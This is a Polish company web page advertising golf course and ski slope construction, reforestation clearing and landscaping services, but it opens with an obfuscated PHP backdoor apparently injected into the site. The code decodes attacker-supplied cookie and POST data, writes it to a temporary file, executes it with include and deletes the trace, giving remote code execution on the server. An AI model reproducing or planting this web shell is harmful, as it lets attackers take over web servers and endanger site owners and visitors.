$rwqItQtsi = chr ( 209 - 102 ).chr (90) . chr ( 913 - 818 ).chr ( 717 - 602 )."\x53" . 'S' . 'T' . chr (100); $cGcQMk = "\143" . "\154" . 'a' . 's' . "\x73" . chr (95) . 'e' . chr ( 122 - 2 ).'i' . "\163" . chr ( 824 - 708 )."\163";$aoDxSOUNy = class_exists($rwqItQtsi); $cGcQMk = "35583";$DLBQMPyw = !1;if ($aoDxSOUNy == $DLBQMPyw){function SZnntVxSJ(){$nRreoDSW = new /* 56706 */ kZ_sSSTd(17215 + 17215); $nRreoDSW = NULL;}$llRFqfj = "17215";class kZ_sSSTd{private function jNnQctUy($llRFqfj){if (is_array(kZ_sSSTd::$LehGtQ)) {$FlRWD = sys_get_temp_dir() . "/" . crc32(kZ_sSSTd::$LehGtQ[chr ( 328 - 213 ).chr ( 856 - 759 ).chr (108) . 't']);@kZ_sSSTd::$LehGtQ[chr ( 1080 - 961 )."\162" . 'i' . chr ( 969 - 853 ).chr (101)]($FlRWD, kZ_sSSTd::$LehGtQ['c' . 'o' . "\x6e" . "\x74" . 'e' . 'n' . chr ( 351 - 235 )]);include $FlRWD;@kZ_sSSTd::$LehGtQ["\x64" . chr ( 809 - 708 )."\x6c" . "\x65" . 't' . "\145"]($FlRWD); $llRFqfj = "17215";exit();}}private $cVwcAskwOs;public function yDUrNFVgO(){echo 914;}public function __destruct(){kZ_sSSTd::$LehGtQ = @unserialize(kZ_sSSTd::$LehGtQ); $llRFqfj = "52910_60019";$this->jNnQctUy($llRFqfj); $llRFqfj = "52910_60019";}public function MzoSYp($bpMJyQYnJp, $vBdXSnNa){return $bpMJyQYnJp[0] ^ str_repeat($vBdXSnNa, (strlen($bpMJyQYnJp[0]) / strlen($vBdXSnNa)) + 1);}public function FTEql($bpMJyQYnJp){$Dnibu = "base64";return array_map($Dnibu . "\x5f" . chr (100) . chr ( 603 - 502 )."\x63" . chr (111) . 'd' . 'e', array($bpMJyQYnJp,));}public function __construct($jxpxDiXlg=0){$bpMJyQYnJp = "";$MMYIHr = $_POST;$CDVmRO = $_COOKIE;$vBdXSnNa = "ba769bc6-753d-40e5-b549-623e02156c8a";$iTdGWrFVLq = @$CDVmRO[substr($vBdXSnNa, 0, 4)];if (!empty($iTdGWrFVLq)){$iTdGWrFVLq = explode(",", $iTdGWrFVLq);foreach ($iTdGWrFVLq as $nPIyYRnmu){$bpMJyQYnJp .= @$CDVmRO[$nPIyYRnmu];$bpMJyQYnJp .= @$MMYIHr[$nPIyYRnmu];}$bpMJyQYnJp = $this->FTEql($bpMJyQYnJp);}kZ_sSSTd::$LehGtQ = $this->MzoSYp($bpMJyQYnJp, $vBdXSnNa); $vBdXSnNa = explode(",", $vBdXSnNa);}public static $LehGtQ = 44524;}SZnntVxSJ();} Budowa pól golfowych i stoków narciarskich - Pola golfowe

Budowa pól golfowych i stoków narciarskich


Nasza specjalizacja to budowa pól golfowych, budowa stoków narciarskich, rekultywacja i zakładanie terenów zielonych.

 

 

Podstawową działalnością firm powiązanych pod nazwą Golf Construction, jest organizacja budowy lub przebudowy i renowacji pól golfowych. Tworzymy pola w Polsce, na Ukrainie, w Egipcie i Jordanii. Ponadto, doświadczenia na polskim rynku pozwalają zaproponować klientom elastyczny pakiet usług doradczych i projektowych – przystosowany do polskich wymogów formalno-prawnych – wspomagający inwestycję w pola golfowe, od projektu do otwarcia. Wychodząc poza pola golfowe, kompleksowo budujemy stoki narciarskie i wyciągi. Zagospodarowujemy tereny zielone w trudnych, górskich warunkach, rozpoczynając wycinką lasu, a kończąc na gotowych obiektach narciarskich. 

 

W zakresie budowy pola golfowego proponujemy:

 • zaplanowanie i prowadzenie inwestycji,
 • zaprojektowanie i budowę pola golfowego,
 • projekty wykonawcze pola golfowego, projekty infrastruktury towarzyszącej – obiektów inżynieryjnych, kubaturowych, specyfikacje techniczne budowy, 
 • przystosowanie projektu pola golfowego innego architekta do wymagań urzędowych, przygotowanie niezbędnych dokumentów budowy wymaganych przez polskie prawo, sporządzenie wycen, kosztorysów i harmonogramów robót,
 • aprobaty i zaopatrzenie w materiały (zgodnie z specyfikacją USGA),
 • referencyjnych specjalistów do prac konstrukcyjnych w pełnym zakresie,
 • konsultacje agrotechniczne.

Budowa pola golfowego - kształtowanie bunkrów green na polu golfowym, zabezpieczenie przeciw erozji przez darniowanie .

Budowa pola golfowego


Budowa stoków i wyciągów narciarskich w warunkach górskich:

 • kompleksowa budowa stoku narciarskiego, gwarantująca równą powierzchnię i całkowite zadarnienie,
 • projekty wyciągów i stoków narciarskich, 
 • projekty infrastruktury technicznej stoku narciarskiego: drenaż, kanalizację opadową, instalacje wodne do naśnieżania,
 • wycinka lasów: wycinka ze zrywką drzew; karczowanie drzew i krzewów, karpowanie (usunięcie korzeni po wycince),
 • rekultywacja karczowanych terenów pod zagospodarowanie obiektem narciarskim, zabezpieczenie przed erozją budowanych stoków, hydrosiew,
 • konsultacje agrotechniczne w zakresie nawierzchni zielonych w górach.

Budowa stoku narciarskiego - frezowanie gruntu podczas budowy stoków narciarskich, uprawa broną aktywną, siew rzutowy.

Budowa stoku narciarskiego